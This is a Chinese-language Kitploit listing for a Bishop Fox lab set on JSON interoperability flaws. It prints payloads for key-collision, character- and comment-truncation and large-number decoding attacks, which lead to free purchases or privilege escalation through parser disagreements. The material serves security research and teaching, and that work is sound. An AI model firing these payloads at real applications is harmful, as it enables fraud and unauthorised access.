Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
json-interop-vuln-labs — 《JSON 互操作性漏洞探索》的配套实验 | Kitploit
工具/GitHubGitHub/bishopfox/json-interop-vuln-labs
漏洞分析Web应用程序漏洞利用Web安全学习与教育实验室与实践
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

《JSON 互操作性漏洞探索》的配套实验

查看仓库
210193年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

JSON 互操作性漏洞实验室

描述

这些是我研究文章《探索 JSON 互操作性漏洞》的配套实验室。

实验 1:电子商务应用中的免费购买

  • 键碰撞攻击:重复键优先级不一致
  • 大数表示不一致

实验 2:多租户应用中的权限提升

  • 键碰撞攻击:字符截断

默认情况下,这些实验室绑定到主机的 5000-5004 端口。

攻击技术

1. 键碰撞

重复键优先级不一致

root@kitploit:~
{"qty": 1, "qty": -1}

字符截断

对于后键优先的解析器,会发生截断(对于前键优先的解析器,则需翻转顺序)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

注释截断

这些文档利用了各解析器对注释和无引号字符串支持不一致的特性:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. 数字解码

大数解码不一致

这些大数值可能会被转换为字符串(例如,“+Infinity”),从而可能导致类型混淆漏洞。或者,它们可能被转换为 MAX_INT/MIN_INT、四舍五入的值或 0,从而可能绕过业务逻辑。

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

作者

Twitter: @theBumbleSec

GitHub: the-bumble

下载工具